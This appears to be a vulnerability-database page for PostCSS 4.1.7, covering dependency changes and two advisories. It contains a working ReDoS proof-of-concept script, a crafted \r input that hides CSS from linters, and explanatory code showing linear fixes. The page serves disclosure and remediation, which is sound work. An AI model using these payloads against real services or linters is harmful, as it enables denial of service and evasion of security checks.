PostCSS 4.1.7 is a minor iteration over 4.1.6, consisting of refinements and bug fixes rather than new features. Both versions transform CSS through JavaScript plugins, which lets developers automate tasks such as vendor prefixing, adoption of future syntax, and code optimization. They share the same runtime dependencies (js-base64, source-map, and es6-promise), so the functionality available to consuming projects is unchanged.
The differences are in the development dependencies, which matter only to people building or testing PostCSS itself: a project that depends on postcss does not install them. Version 4.1.7 drops less, cssom, mensch, rework, stylus, cssnext, gonzales, node-sass, browserify, gulp-bench, gonzales-pe, stylecow-parser, and gulp-bench-summary, all of which 4.1.6 listed, and bumps gulp-eslint from 0.11.0 to 0.11.1. Removing the third-party parsers and benchmark tooling points to a smaller, faster contributor workflow and a stabilization-oriented release; it does not change the install footprint or behaviour of the package that end users receive. If you run the PostCSS test suite or benchmarks locally and relied on any of the removed tooling, adjust your development environment accordingly.
Known vulnerabilities affecting version 4.1.7 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a stylesheet that repeats the source-map annotation prefix n times
// and never closes the comment, so the annotation regex has to backtrack.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!"
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively longer payloads and report how long each takes;
// on an affected version the time grows much faster than the input length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now()
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    } catch (e) {
      var time_cost = Date.now() - time
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
  }
}
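The following is an added illustration, not code from PostCSS or from the advisory. It puts a regex completed from the sub-pattern quoted above (in the /*# sourceMappingURL= form the PoC sends, with the comment terminator appended) next to a linear-time extractor that finds the same annotation with two substring searches, and reuses the PoC's payload construction. The function names, the PREFIX constant and the timing helper are this example's own, and the linear extractor is this example's design rather than the upstream fix.

```javascript
// Added example, not PostCSS code: the backtracking shape of the annotation
// regex beside a substring-based extractor, with the PoC's payload builder.

// Regex completed from the sub-pattern in the advisory, in the
// "/*# sourceMappingURL=" form the PoC sends, plus the comment terminator.
// On a stylesheet holding many prefixes and no "*/", each prefix starts a
// match in which "(.*)" runs to the end of the line and then backs off one
// character at a time, so total work grows with the square of the length.
const ANNOTATION_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//

function annotationByRegex(css) {
  const m = ANNOTATION_RE.exec(css)
  return m ? m[1].trim() : null
}

// Linear alternative (this example's own design): locate the last prefix,
// then the first "*/" after it. Two substring searches, no backtracking.
const PREFIX = '/*# sourceMappingURL='

function annotationByScan(css) {
  const start = css.lastIndexOf(PREFIX)
  if (start === -1) return null
  const end = css.indexOf('*/', start + PREFIX.length)
  if (end === -1) return null
  return css.slice(start + PREFIX.length, end).trim()
}

// Same construction as build_attack() in the PoC above: n prefixes, no "*/".
function buildAttack(n) {
  return 'a{}' + PREFIX.repeat(n) + '!'
}

// Wall-clock milliseconds for one call; used only for the demonstration.
function timeMs(fn, input) {
  const t0 = Date.now()
  fn(input)
  return Date.now() - t0
}

// Demonstration on a well-formed sheet and on constructed payloads. n is
// kept small so the regex variant finishes; raise it to see the growth.
const good = 'a{}/*# sourceMappingURL=a.css.map */'
console.log('scan:', annotationByScan(good), '| regex:', annotationByRegex(good))
for (const n of [500, 1000, 2000]) {
  const attack = buildAttack(n)
  console.log('n=' + n, 'length=' + attack.length,
    'scan ' + timeMs(annotationByScan, attack) + ' ms,',
    'regex ' + timeMs(annotationByRegex, attack) + ' ms')
}
```

Run it with node. On the payload the scan returns null almost immediately because no */ follows the last prefix, while the regex variant's time roughly quadruples each time n doubles; that is the behaviour the PoC above measures against postcss.parse itself. Note that the scan deliberately takes the last prefix, so an annotation inside an earlier comment or string cannot shadow the real one.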
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment. Version 4.1.7 predates the fixed release by a wide margin and is therefore affected; the issue only matters where the CSS being parsed comes from an untrusted source, and the remedy is to upgrade to 8.4.31 or later.
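As an added example, not the PostCSS tokenizer and not part of the advisory, the snippet below models the one decision that produces this kind of discrepancy: whether a parenthesised span may be consumed as a single opaque token without looking inside it. The two bad-bracket checks and the tokenizer are this example's own simplified construction; the rule they demonstrate is a general JavaScript one: the dot metacharacter never matches a line terminator, and \r is a line terminator, so a check written as .[\n...] silently lets a \r through where the same check would reject a \n. Run on the sample from the advisory, the first version leaves the /* buried inside the brackets, while the \r-aware version opens a comment there.

```javascript
// Added example, not PostCSS code: a minimal tokenizer with two variants of
// a "bad bracket" check, run on the advisory's sample input.

// In JavaScript regexes "." never matches a line terminator (\n, \r, \u2028,
// \u2029). In the first pattern "\r" is neither matched by "." nor listed in
// the class, so "(\r" passes the check; the second lists "\r" explicitly.
const BAD_BRACKET_NO_CR = /.[\n"'(/\\]/
const BAD_BRACKET_WITH_CR = /.[\r\n"'(/\\]/

// Simplified scan (this example's own): a "(" whose span up to the next ")"
// passes the check becomes one opaque "brackets" token and its contents are
// never examined; otherwise "(" is emitted alone and the scan continues
// inside, where "/*" opens a comment that runs to "*/" or end of input.
function tokenize(css, badBracket) {
  const tokens = []
  let pos = 0
  while (pos < css.length) {
    const ch = css[pos]
    if (ch === '(') {
      const close = css.indexOf(')', pos)
      if (close !== -1) {
        const span = css.slice(pos, close + 1)
        if (!badBracket.test(span)) {
          tokens.push(['brackets', span])
          pos = close + 1
          continue
        }
      }
      tokens.push(['(', '('])
      pos += 1
    } else if (ch === '/' && css[pos + 1] === '*') {
      const end = css.indexOf('*/', pos + 2)
      const text = end === -1 ? css.slice(pos) : css.slice(pos, end + 2)
      tokens.push(['comment', text])
      pos += text.length
    } else {
      // Everything else: one token per run up to the next "(" or "/*".
      let end = pos + 1
      while (end < css.length && css[end] !== '(' &&
             !(css[end] === '/' && css[end + 1] === '*')) end++
      tokens.push(['word', css.slice(pos, end)])
      pos = end
    }
  }
  return tokens
}

// The comments a given check causes the scan to recognise.
function commentsIn(css, badBracket) {
  return tokenize(css, badBracket).filter(t => t[0] === 'comment').map(t => t[1])
}

// Constructed inputs: the advisory's sample, and the same text with "\n".
const SAMPLE_CR = '@font-face{ font:(\r/*);}'
const SAMPLE_LF = '@font-face{ font:(\n/*);}'

console.log('CR, "." based check :', commentsIn(SAMPLE_CR, BAD_BRACKET_NO_CR))
console.log('CR, \\r-aware check  :', commentsIn(SAMPLE_CR, BAD_BRACKET_WITH_CR))
console.log('LF, "." based check :', commentsIn(SAMPLE_LF, BAD_BRACKET_NO_CR))
```

With the dot-based check the \r sample yields no comment at all and the rest of the rule stays live, whereas the \n sample and the \r-aware check both turn /*);} into a comment. A linter that reports on the first tokenization and a consumer that behaves like the second are looking at different stylesheets, which is the discrepancy the advisory describes. The practical check when writing such patterns is to list \r wherever \n is listed rather than relying on the dot to cover it.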